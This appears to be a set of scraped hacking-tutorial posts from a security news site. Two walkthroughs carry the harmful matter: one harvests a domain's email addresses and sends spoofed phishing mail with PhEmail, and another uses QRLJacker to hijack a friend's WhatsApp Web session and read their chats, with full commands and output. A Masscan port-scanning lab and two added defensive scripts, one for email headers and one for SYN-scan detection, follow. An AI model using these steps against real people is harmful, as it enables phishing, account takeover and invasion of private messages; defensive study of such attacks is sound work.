  • After starting phemail, you can gather your target email addresses to send the malicious email to.
  • Type ./phemail.py -S google -d example.com -F 1 -p 12
  • -S is used to send the query to a search engine. We have used Google to search for the email addresses of the target domain.
  • -d is used to give the domain of the email addresses to gather. NOTE: for the security of the tested domain we have changed the original domain name to example. The generated list below is used in sending the malicious email.
  • -F is used for the format of the email addresses. As phemail collects emails from the internet using a search engine, with this option it will gather email addresses in the form firstname.surname@example.com
  • -p is used to specify the number of mail addresses to fetch from the target domain. Here 12 mail addresses will be fetched.
root@kali:~/Downloads/PhEmail# ./phemail.py -S google -d example.com -F 1 -p 12
Gathering emails for domain: example.com
Google Query: example
./phemail.py:281: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.
The code that caused this warning is on line 281 of the file ./phemail.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
html = BeautifulSoup(data)
100%
agus.kurniawan@example.com
anders.liliegren@example.com
andrea.wiseman@example.com
andrew.cavallaro@example.com
anna.faoagali@example.com
antonette.sullivan@example.com
ashfaq-ahmad.jan@example.com
ayman-al.maaraf@example.com
bernadette.oulton@example.com
bobby-esther.mak@example.com
carolyn.riley@example.com
danny.wilson@example.com
dinesh-varma.indukuri@example.com
doctor.example@example.com
  • For testing we have used a temporary mail ID. Go to https://temp-mail.org/en/
  • Add the temporary mail address to emails.txt
root@kali:~/Downloads/PhEmail# nano emails.txt
GNU nano 3.2 emails.txt
halevedopo@direct-mail.info
  • Save the file: press Ctrl + X, then press Shift + Y & press Enter.
  • Type nano body.txt to create the body of the phishing email. Write the text which will be displayed in the phishing email.
root@kali:~/Downloads/PhEmail# nano body.txt
GNU nano 3.2 body.txt
need to talk right now
  • Save the file: press Ctrl + X, then press Shift + Y & press Enter.
  • Type ./phemail.py -e emails.txt -f "Name Surname name_surname@example.com" -r "Name Surname name_surname@example.com" -s "Subject" -b body.txt
  • -e is used to give the list of email IDs.
  • -f is from_address: the source email address displayed in the FROM field of the email.
  • -r is reply_address: the actual email address used to send the emails, in case people reply to the email.
  • -s is used to write the subject of the email.
  • -b is used to give the body of the email.
root@kali:~/Downloads/PhEmail# ./phemail.py -e emails.txt -f "Name Surname name_surname@example.com" -r "Name Surname name_surname@example.com" -s "Subject" -b body.txt
Domain: direct-mail.info
SMTP server: mail.direct-mail.info
./phemail.py:115: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.
The code that caused this warning is on line 115 of the file ./phemail.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
html = BeautifulSoup(body)
Sent to halevedopo@direct-mail.info
Domain: outlook.com
  • The above command has sent the phishing email to the target mail address. The same result is shown in the ethical hacking classes of International Institute of Cyber Security.
  • Below is the testing mail box.
  • The above mail box has received the mail.

Analyzing Temporary Mail Header :-

  • Opening the email header of the temporary mail shows the same email address in From & Reply-To.
Received: from 127.0.0.1
    by node3 (Haraka/2.8.16) with ESMTP id 5055F1D0-04FF-4831-B67F-CC4EA11CFE35.1
    envelope-from name_surname@example.com;
    Wed, 24 Apr 2019 11:55:34 +0000
Content-Type: multipart/related;
boundary="===============1127976200482479669=="
MIME-Version: 1.0
from: Name Surname name_surname@example.com
subject: Subject
reply-to: Name Surname name_surname@example.com
to: josotese@emailapps.info

This is a multi-part message in MIME format.
--===============1127976200482479669==
Content-Type: multipart/alternative;
boundary="===============1585715368107923823=="
MIME-Version: 1.0

--===============1585715368107923823==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

This is the alternative plain text message.
--===============1585715368107923823==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
need to talk right now
--===============1585715368107923823==--
--===============1127976200482479669==--
  • The above shows the same email ID in From & Reply-To.
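The header above is also what a recipient's mail administrator or an incident responder would examine, and the interesting facts are the ones the article's screenshot does not spell out: the envelope-from, the From: header and the Reply-To: all carry the same address, the receiving server recorded no Authentication-Results (so no SPF, DKIM or DMARC verdict exists for the message), and the only Received: hop is from 127.0.0.1, which says nothing about where the message really came from. As an added example (not PhEmail's code or the article's), the Python script below extracts those identities from a raw header block and lists such observations; the sample header is constructed from the one shown above, with the folded Received: line indented as a mail server writes it, and the alignment check is a simplified version of DMARC's SPF alignment (exact domain match).

```python
import re
import ipaddress
from email.parser import HeaderParser

# Constructed sample modelled on the header shown above.
SAMPLE_HEADER = """\
Received: from 127.0.0.1
    by node3 (Haraka/2.8.16) with ESMTP id 5055F1D0-04FF-4831-B67F-CC4EA11CFE35.1
    envelope-from name_surname@example.com;
    Wed, 24 Apr 2019 11:55:34 +0000
Content-Type: multipart/related;
    boundary="===============1127976200482479669=="
MIME-Version: 1.0
from: Name Surname name_surname@example.com
subject: Subject
reply-to: Name Surname name_surname@example.com
to: josotese@emailapps.info

(body omitted)
"""

ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


def first_address(value):
    """First addr-spec inside a header value (the sample uses no angle brackets)."""
    m = ADDR_RE.search(value or "")
    return m.group(0).lower() if m else None


def domain_of(addr):
    return addr.rsplit("@", 1)[1] if addr else None


def analyze_headers(raw):
    """Extract the sender identities from a raw header block and list what a
    receiver should notice about them."""
    msg = HeaderParser().parsestr(raw)
    from_addr = first_address(msg.get("From"))
    reply_to = first_address(msg.get("Reply-To"))
    # Every hop prepends its own Received: line, so the last one in the
    # message is the hop nearest the sender.
    received = msg.get_all("Received") or []
    earliest = received[-1] if received else ""
    env = re.search(r"envelope-from\s+<?([^\s;>]+)", earliest)
    envelope_from = env.group(1).lower() if env else None
    hop = re.search(r"from\s+\[?(\d{1,3}(?:\.\d{1,3}){3})", earliest)

    findings = []
    authenticated = msg.get("Authentication-Results") is not None
    if not authenticated:
        findings.append("no Authentication-Results header: SPF/DKIM/DMARC were "
                        "not evaluated or not recorded by the receiving server")
    # Simplified DMARC SPF alignment: the From: domain must equal the
    # envelope-from domain that SPF is checked against.
    aligned = (domain_of(from_addr) is not None
               and domain_of(from_addr) == domain_of(envelope_from))
    if not aligned:
        findings.append("From: domain differs from the envelope-from domain "
                        "(SPF alignment fails)")
    if reply_to and domain_of(reply_to) != domain_of(from_addr):
        findings.append("Reply-To: points to a different domain than From:")
    if hop:
        ip = ipaddress.ip_address(hop.group(1))
        if ip.is_loopback or ip.is_private:
            findings.append(f"earliest Received hop is {ip} (loopback/private): "
                            "the submitting host cannot be identified from this header")
    return {"from": from_addr, "reply_to": reply_to, "envelope_from": envelope_from,
            "spf_aligned": aligned, "authenticated": authenticated,
            "findings": findings}


if __name__ == "__main__":
    result = analyze_headers(SAMPLE_HEADER)
    print("From:", result["from"], "| Reply-To:", result["reply_to"],
          "| envelope-from:", result["envelope_from"])
    for finding in result["findings"]:
        print("-", finding)
```

Matching From, Reply-To and envelope-from is by itself neither proof of legitimacy nor of forgery; what decides the question is whether the domain in From: publishes SPF, DKIM and a DMARC policy and whether the receiving server verified them, and the absence of an Authentication-Results header means that verification never happened for this message.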

Tracing Email ID :-

  • Further, we have traced the above header using an online email tracer. Go to: https://www.iplocation.net/trace-email
  • The email tracer has found the location from where the mail was sent.


Hack Whatsapp account of your friend https://www.securitynewspaper.com/2019/04/16/hack-whatsapp-account-of-your-friend/ Tue, 16 Apr 2019 19:09:48 +0000 https://www.securitynewspaper.com/?p=14799

The post Hack Whatsapp account of your friend appeared first on Information Security Newspaper | Hacking News.


Social engineering attacks still work. Most attackers use social engineering methods to trick targets. According to an ethical hacking researcher of International Institute of Cyber Security, social engineering methods are used by QRLJacker, a tool used to obtain WhatsApp Web sessions. The whole program is written in Python. This tool works on the principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather users' credentials.

QRLJacker is the most common tool used in WhatsApp session hijacking, which can be helpful in the initial phase of pentesting.

  • For testing we have used a live Kali Linux 2019.4 amd64. While testing, QRLJacker sometimes did not work on installed versions of Kali Linux; we have tested it on live boots of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
  • geckodriver is the WebDriver proxy for Gecko, the browser engine used in applications developed by Mozilla. It creates the link between Selenium (a Python module) & the Mozilla browser. To install it type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
  • Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to the extracted one.
  • Type sudo mv -f geckodriver /usr/local/share/geckodriver
  • Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
  • Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Remember to update the Firefox browser. For that, type sudo apt-get update & sudo apt-get install firefox-esr
  • Type apt-get install python3.7
  • Type git clone https://github.com/OWASP/QRLJacking
  • Type python3.7 -m pip install -r requirements.txt
  • Type python3.7 QrlJacker.py
_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!
  • Type help
QrlJacker > help
General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.
  • Type list & type use grabber/whatsapp
 QrlJacker > list
Name Description
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
  • Type options & type set port 1337
  • Type set host 192.168.1.7
 QrlJacker Module(grabber/whatsapp) > set port 1337
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent

Type run. You can also run this on port 80 rather than 1337, to make it look like a real WhatsApp page.

QrlJacker Module(grabber/whatsapp) > run
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
  • After starting the QRLJacker server, you can send this link to your target. For testing we have opened the generated QRLJacker code on Windows 7. Type 192.168.1.7:1337
  • For usage we have opened WhatsApp 2.19.98. Scan the QR code with WhatsApp Web from your mobile, or ask your friend to log in to WhatsApp Web using social engineering techniques.
  • Go to the terminal where you have started QRLJacker on Kali. Type sessions; it will show the WhatsApp accounts connected to QRLJacker sessions.
QrlJacker Module(grabber/whatsapp) > sessions
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
  • When you type sessions -i 0, the Kali Linux web browser opens with the target WhatsApp account. First it opens web.whatsapp.com.
  • After 1 or 2 seconds the target WhatsApp account opens.
  • Now you can see all the WhatsApp chats.

Practical Video on QrlJacking :-

The above video was posted by an ethical hacking student of the International Institute of Cyber Security, Delhi, India. In the next post we will analyse how QRLJacker works.

The post Hack Whatsapp account of your friend appeared first on Information Security Newspaper | Hacking News.

]]>
How to Scan whole country IP Addresses in a while
https://www.securitynewspaper.com/2019/04/10/how-to-scan-whole-country-ip-addresses-in-a-while/
Thu, 11 Apr 2019 00:57:12 +0000
https://www.securitynewspaper.com/?p=13829
In some phases of information gathering, a pentester needs to scan the IP addresses that are most commonly used. According to an ethical hacking researcher at the International Institute of…

The post How to Scan whole country IP Addresses in a while appeared first on Information Security Newspaper | Hacking News.

]]>
In some phases of information gathering, a pentester needs to scan the IP addresses that are most commonly used. According to an ethical hacking researcher at the International Institute of Cyber Security, scanning is the most important phase of penetration testing. The most common addresses are those of routers or search engines. These common scans are used to check normal activity, i.e. how the target is using the internet. There are many popular tools, such as nmap (network mapper), which scan open ports and IP addresses. But today we are talking about Masscan.

According to an ethical hacking researcher at the International Institute of Cyber Security, masscan helps in the scanning phase of pentesting / VAPT.

Masscan is a tool which scans the internet in a very short time. It uses asynchronous scanning, similar to nmap. The tool scans the target on custom ports or IPs. Masscan is the fastest tool for scanning open ports. To demonstrate it, we tested it on Kali Linux 2018.4 in VMware. We will scan local IP addresses and whole-country IP ranges, and show the packet analysis in Wireshark to check how noisy Masscan is on the network.

Scanning Local Networks :-

  • Here we have created a local network of 3 computers to show how masscan sends its packets.
  • 192.168.1.20 and 192.168.1.22 are the target machines, both running Windows; the attacking machine is Kali Linux 2018.4.

Steps to configure your Virtual Machines IP’s

  • To assign static IP addresses, go to Control Panel / Network and Internet / Network Connections.
  • Open the Local Area Connection properties and the IPv4 settings. Enter the IP 192.168.1.20.
  • Repeat the above process on the other computer with the IP 192.168.1.22.
  • After creating the local network, check it by pinging both IP addresses: open cmd on each computer and type ping 192.168.1.20 on one and ping 192.168.1.22 on the other.
  • To ping from Kali Linux you have to create a virtual network in VMware.
  • Go to the Kali Linux network settings and enter a static IP: in the Wi-Fi settings select manual, type 192.168.1.23 as the IPv4 address and 255.255.255.0 as the subnet mask.
  • Go to the Virtual Network Editor of VMware in Windows.
  • Select the network editor as shown below. Remember to select the appropriate settings.
  • As shown above, click on VMnet0 and select the network interface card.
  • Then click on VMnet8 and select the local Ethernet adapter.
  • Click Apply and OK.
  • Then go to the Kali VMware settings, open the network settings and select the virtual network adapter.

Installing Masscan on Kali :-

  • After assigning static IP addresses to the target computers and Kali Linux, install the required libraries in Kali Linux before using masscan.
  • Type sudo apt-get install git gcc make libpcap-dev in the Kali Linux terminal.
root@kali:/home/iicybersecurity/Downloads/masscan# sudo apt-get install git gcc make libpcap-dev
Reading package lists… Done
Building dependency tree
Reading state information… Done
make is already the newest version (4.2.1-1.2).
make set to manually installed.
The following package was automatically installed and is no longer required:
php7.2
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
cpp cpp-8 g++ g++-8 gcc-8 gcc-8-base git-man lib32gcc1 lib32stdc++6 libasan5 libatomic1 libcc1-0 libgcc-8-dev libgcc1 libgfortran5
libgomp1 libitm1 liblsan0 libmpx2 libobjc-8-dev libobjc4 libpcap0.8-dev libquadmath0 libstdc++-8-dev libstdc++6 libtsan0 libubsan1
Suggested packages:
cpp-doc gcc-8-locales g++-multilib g++-8-multilib gcc-8-doc libstdc++6-8-dbg gcc-multilib autoconf automake libtool bison gcc-doc
gcc-8-multilib libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan5-dbg liblsan0-dbg libtsan0-dbg libubsan1-dbg
libmpx2-dbg libquadmath0-dbg git-daemon-run | git-daemon-sysvinit git-doc git-el git-email git-gui gitk gitweb git-cvs
git-mediawiki git-svn libstdc++-8-doc
The following NEW packages will be installed:
libpcap-dev libpcap0.8-dev
The following packages will be upgraded:
cpp cpp-8 g++ g++-8 gcc gcc-8 gcc-8-base git git-man lib32gcc1 lib32stdc++6 libasan5 libatomic1 libcc1-0 libgcc-8-dev libgcc1
libgfortran5 libgomp1 libitm1 liblsan0 libmpx2 libobjc-8-dev libobjc4 libquadmath0 libstdc++-8-dev libstdc++6 libtsan0 libubsan1
28 upgraded, 2 newly installed, 0 to remove and 1094 not upgraded.
Need to get 266 kB/37.1 MB of archives.
After this operation, 2,753 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 libpcap0.8-dev amd64 1.8.1-6 [240 kB]
Get:2 https://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 libpcap-dev amd64 1.8.1-6 [25.9 kB]
Fetched 266 kB in 9s (28.6 kB/s)
Reading changelogs… Done
(Reading database … 342760 files and directories currently installed.)
Preparing to unpack …/0-libquadmath0_8.2.0-13_amd64.deb …
Unpacking libquadmath0:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/1-libubsan1_8.2.0-13_amd64.deb …
-------------------------------SNIP------------------------------
Unpacking libubsan1:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/2-lib32gcc1_1%3a8.2.0-13_amd64.deb …
Unpacking lib32gcc1 (1:8.2.0-13) over (1:8.2.0-7) …
Preparing to unpack …/3-libitm1_8.2.0-13_amd64.deb …
Unpacking libitm1:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/4-libgfortran5_8.2.0-13_amd64.deb …
Unpacking libgfortran5:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/5-libasan5_8.2.0-13_amd64.deb …
Unpacking libasan5:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/6-lib32stdc++6_8.2.0-13_amd64.deb …
Unpacking lib32stdc++6 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/7-gcc-8-base_8.2.0-13_amd64.deb …
Unpacking gcc-8-base:amd64 (8.2.0-13) over (8.2.0-7) …
Setting up gcc-8-base:amd64 (8.2.0-13) …
(Reading database … 342760 files and directories currently installed.)
Preparing to unpack …/libstdc++6_8.2.0-13_amd64.deb …
Unpacking libstdc++6:amd64 (8.2.0-13) over (8.2.0-7) …
Setting up libstdc++6:amd64 (8.2.0-13) …
(Reading database … 342760 files and directories currently installed.)
Preparing to unpack …/00-libgomp1_8.2.0-13_amd64.deb …
Unpacking libgomp1:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/01-libatomic1_8.2.0-13_amd64.deb …
Unpacking libatomic1:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/02-liblsan0_8.2.0-13_amd64.deb …
Unpacking liblsan0:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/03-libtsan0_8.2.0-13_amd64.deb …
Unpacking libtsan0:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/04-libmpx2_8.2.0-13_amd64.deb …
Unpacking libmpx2:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/05-cpp-8_8.2.0-13_amd64.deb …
Unpacking cpp-8 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/06-libcc1-0_8.2.0-13_amd64.deb …
Unpacking libcc1-0:amd64 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/07-gcc-8_8.2.0-13_amd64.deb …
Unpacking gcc-8 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/08-g++-8_8.2.0-13_amd64.deb …
Unpacking g++-8 (8.2.0-13) over (8.2.0-7) …
Preparing to unpack …/1-gcc_4%3a8.2.0-2_amd64.deb …
Unpacking gcc (4:8.2.0-2) over (4:8.1.0-1) …
Preparing to unpack …/2-cpp_4%3a8.2.0-2_amd64.deb …
Unpacking cpp (4:8.2.0-2) over (4:8.1.0-1) …
Preparing to unpack …/3-git_1%3a2.20.1-1_amd64.deb …
Unpacking git (1:2.20.1-1) over (1:2.19.1-1) …
Preparing to unpack …/4-git-man_1%3a2.20.1-1_all.deb …
Unpacking git-man (1:2.20.1-1) over (1:2.19.1-1) …

  • Type git clone https://github.com/robertdavidgraham/masscan.git
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/robertdavidgraham/masscan.git
Cloning into 'masscan'…
remote: Enumerating objects: 20, done.
remote: Counting objects: 100% (20/20), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 4101 (delta 6), reused 8 (delta 4), pack-reused 4081
Receiving objects: 100% (4101/4101), 2.56 MiB | 17.00 KiB/s, done.
Resolving deltas: 100% (2778/2778), done.
  • Then type cd masscan
  • Type make and then make install
root@kali:/home/iicybersecurity/Downloads/masscan# make
clang -g -ggdb -Wall -O3 -c src/crypto-base64.c -o tmp/crypto-base64.o
clang -g -ggdb -Wall -O3 -c src/crypto-blackrock2.c -o tmp/crypto-blackrock2.o
clang -g -ggdb -Wall -O3 -c src/event-timeout.c -o tmp/event-timeout.o
clang -g -ggdb -Wall -O3 -c src/in-binary.c -o tmp/in-binary.o
clang -g -ggdb -Wall -O3 -c src/in-filter.c -o tmp/in-filter.o
clang -g -ggdb -Wall -O3 -c src/in-report.c -o tmp/in-report.o
clang -g -ggdb -Wall -O3 -c src/logger.c -o tmp/logger.o
clang -g -ggdb -Wall -O3 -c src/main-conf.c -o tmp/main-conf.o -DGIT=\"1.0.5-51-g6c15edc\"
clang -g -ggdb -Wall -O3 -c src/main-dedup.c -o tmp/main-dedup.o
clang -g -ggdb -Wall -O3 -c src/main-initadapter.c -o tmp/main-initadapter.o
clang -g -ggdb -Wall -O3 -c src/main-listscan.c -o tmp/main-listscan.o
clang -g -ggdb -Wall -O3 -c src/main-ptrace.c -o tmp/main-ptrace.o
clang -g -ggdb -Wall -O3 -c src/main-readrange.c -o tmp/main-readrange.o
clang -g -ggdb -Wall -O3 -c src/main-src.c -o tmp/main-src.o
clang -g -ggdb -Wall -O3 -c src/main-status.c -o tmp/main-status.o
clang -g -ggdb -Wall -O3 -c src/main-throttle.c -o tmp/main-throttle.o
clang -g -ggdb -Wall -O3 -c src/main.c -o tmp/main.o
src/main.c:282:24: warning: passing 'const struct RangeList *' to parameter of type 'struct RangeList *' discards qualifiers
[-Wincompatible-pointer-types-discards-qualifiers]
rangelist_sort(&masscan->targets);
---------------------------SNIP---------------------------------
src/ranges.h:200:34: note: passing argument to parameter 'targets' here
rangelist_sort(struct RangeList *targets);
^
src/main.c:284:24: warning: passing 'const struct RangeList *' to parameter of type 'struct RangeList *' discards qualifiers
[-Wincompatible-pointer-types-discards-qualifiers]
rangelist_sort(&masscan->ports);
^~~~~~~
src/ranges.h:200:34: note: passing argument to parameter 'targets' here
rangelist_sort(struct RangeList *targets);
^
2 warnings generated.
clang -g -ggdb -Wall -O3 -c src/masscan-app.c -o tmp/masscan-app.o
clang -g -ggdb -Wall -O3 -c src/out-binary.c -o tmp/out-binary.o
clang -g -ggdb -Wall -O3 -c src/out-certs.c -o tmp/out-certs.o
clang -g -ggdb -Wall -O3 -c src/out-grepable.c -o tmp/out-grepable.o
clang -g -ggdb -Wall -O3 -c src/out-json.c -o tmp/out-json.o
clang -g -ggdb -Wall -O3 -c src/out-ndjson.c -o tmp/out-ndjson.o
clang -g -ggdb -Wall -O3 -c src/out-null.c -o tmp/out-null.o
clang -g -ggdb -Wall -O3 -c src/out-redis.c -o tmp/out-redis.o
clang -g -ggdb -Wall -O3 -c src/out-tcp-services.c -o tmp/out-tcp-services.o
clang -g -ggdb -Wall -O3 -c src/out-text.c -o tmp/out-text.o
clang -g -ggdb -Wall -O3 -c src/out-unicornscan.c -o tmp/out-unicornscan.o
clang -g -ggdb -Wall -O3 -c src/out-xml.c -o tmp/out-xml.o
clang -g -ggdb -Wall -O3 -c src/output.c -o tmp/output.o
clang -g -ggdb -Wall -O3 -c src/pixie-backtrace.c -o tmp/pixie-backtrace.o
  • Type masscan
root@kali:/home/iicybersecurity/Downloads/masscan# masscan
usage:
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
scan some web ports on 10.x.x.x at 10kpps
masscan --nmap
list those options that are compatible with nmap
masscan -p80 10.0.0.0/8 --banners -oB
save results of scan in binary format to
masscan --open --banners --readscan -oX
read binary scan results in and save them as xml in
  • Type masscan to view the help menu.
  • Start Wireshark in Kali Linux or on the host machine, select the network interface and watch the packets.
  • If Wireshark is not installed in Kali Linux, install it from https://packages.qa.debian.org/w/wireshark.html; for Windows go to https://www.wireshark.org/download.html

Scanning Target Computers :-

  • To scan, type masscan -p0-1000 192.168.1.20 --router-mac <enter mac address>
  • 192.168.1.20 is the target computer.
  • To find the MAC address, open cmd on the target computer and type getmac.
  • -p is used to enter ports. You can give a port range such as -p0-5000, or specify the ports of your choice.
  • --router-mac is used to enter the MAC address of the target.
root@kali:/home/iicybersecurity# masscan -p0-1000 192.168.1.20 --router-mac <enter mac addresses>
Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 12:03:11 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [1001 ports/host]
Discovered open port 443/tcp on 192.168.1.20
Discovered open port 135/tcp on 192.168.1.20
Discovered open port 912/tcp on 192.168.1.20
Discovered open port 139/tcp on 192.168.1.20
Discovered open port 445/tcp on 192.168.1.20
Discovered open port 902/tcp on 192.168.1.20
  • After running the above command, masscan lists the open ports on the target operating system. If you start Wireshark on the target machine 192.168.1.20 you can see the number of packets arriving from the attacker machine 192.168.1.5, as shown below.
  • The above screenshot shows the TCP transfer of each packet. This information can be used in other hacking activities.
  • Type masscan -p0-1000 192.168.1.22 --router-mac <enter mac address>
  • 192.168.1.22 is the target computer.
  • To find the MAC address, open cmd and type getmac.
  • -p is used to enter ports. You can give a port range such as -p0-1000, or specify the ports of your choice.
  • --router-mac is used to enter the MAC address of the target.
root@kali:/home/iicybersecurity# masscan -p0-1000 192.168.1.22 --router-mac <enter mac address>                                         
Starting masscan 1.0.6 (https://bit.ly/14GZzcT) at 2019-01-10 12:21:21 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [1001 ports/host]
Discovered open port 135/tcp on 192.168.1.22
Discovered open port 445/tcp on 192.168.1.22
Discovered open port 139/tcp on 192.168.1.22
  • After running the above command, masscan lists the ports that are open on the target operating system. This list can be used to build a scenario for further attacks.
  • If you start Wireshark on the target machine 192.168.1.22 you can see the number of packets arriving from the attacker machine 192.168.1.5, as shown below.
  • The above screenshot shows the TCP transfer of each packet, including the 3-way handshake.
  • This information can be used in other hacking activities.
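The Wireshark observation above (a burst of SYNs from one source to many ports on the target, with no completed handshakes) is exactly what a defender watching the scanned host would alert on. The following is an added example, not code from the article or from masscan: a minimal SYN-scan detector run over constructed packet summaries. The Packet class, detect_syn_scans and build_sample_capture are assumptions of this example; the IP addresses and the set of open ports reuse the article's values.

```python
"""Detect SYN-scan behaviour (as produced by masscan) in packet summaries.

Added example, not from the article: the Packet records below are constructed
to resemble what Wireshark or tcpdump would show on the scanned host. A
scanner sends one SYN per port and never completes the handshake, so one
source touching many distinct ports on a host inside a short window is the
signal. Timestamps are in milliseconds so the window arithmetic is exact.
"""
import random
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts_ms: int    # capture time in milliseconds
    src: str      # source IP
    dst: str      # destination IP
    port: int     # service port on the scanned host (recorded for both directions)
    flags: str    # TCP flag letters: "S" = SYN, "SA" = SYN-ACK, "A" = ACK, "R" = RST


def detect_syn_scans(packets, window_ms=2000, threshold=20):
    """Return {(src, dst): max distinct ports seen in one window} for scanning pairs.

    Only pure SYNs (flags == "S") count. For each (src, dst) pair a deque keeps
    the (ts_ms, port) of recent SYNs; entries older than window_ms are evicted
    before counting distinct ports, so a slow, legitimate client that opens a
    few connections over time is never flagged.
    """
    recent = defaultdict(deque)
    alerts = {}
    for p in sorted(packets, key=lambda p: p.ts_ms):
        if p.flags != "S":
            continue
        key = (p.src, p.dst)
        q = recent[key]
        q.append((p.ts_ms, p.port))
        while q and p.ts_ms - q[0][0] > window_ms:
            q.popleft()
        distinct = len({port for _, port in q})
        if distinct >= threshold:
            alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts


def build_sample_capture():
    """Constructed capture: a masscan-style sweep plus one normal SMB client.

    Scanner 192.168.1.5 probes ports 0-1000 on 192.168.1.20 in random order at
    100 packets per second (masscan's default rate); the host answers the open
    ports with SYN-ACK and the scanner replies RST instead of completing the
    handshake. Client 192.168.1.22 opens three ordinary connections, seconds
    apart, and completes each handshake with an ACK.
    """
    scanner, client, host = "192.168.1.5", "192.168.1.22", "192.168.1.20"
    open_ports = {135, 139, 443, 445, 902, 912}        # from the article's scan
    ports = list(range(0, 1001))
    random.Random(0).shuffle(ports)                     # scanners randomise order
    pkts = []
    for i, port in enumerate(ports):
        t = i * 10                                      # 100 pps: one SYN every 10 ms
        pkts.append(Packet(t, scanner, host, port, "S"))
        if port in open_ports:
            pkts.append(Packet(t + 1, host, scanner, port, "SA"))
            pkts.append(Packet(t + 2, scanner, host, port, "R"))
    for j, port in enumerate((445, 139, 135)):
        t = 500 + j * 3000                              # a new connection every 3 s
        pkts.append(Packet(t, client, host, port, "S"))
        pkts.append(Packet(t + 1, host, client, port, "SA"))
        pkts.append(Packet(t + 2, client, host, port, "A"))
    return pkts


if __name__ == "__main__":
    for (src, dst), n in detect_syn_scans(build_sample_capture()).items():
        print(f"possible SYN scan: {src} -> {dst}, {n} distinct ports within 2 s")
```

With a 2 s window and the default 100 pps the scanner pair reaches 201 distinct ports in one window, while the client, which only ever has one SYN inside any window, is never reported. The threshold and window are the knobs to tune against your own baseline traffic.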

Scanning Vulnerable IP addresses :-

  • There are many sources of targets you can use for testing the tool. Next we used the OWASP BWA iso for scanning open ports.
  • The OWASP iso is very popular for testing your hacking skills.
  • To download the iso go to https://sourceforge.net/projects/owaspbwa/
  • After downloading the OWASP iso, open it in VMware and simply start it.
  • After starting the iso, you will see its IP address as shown below.
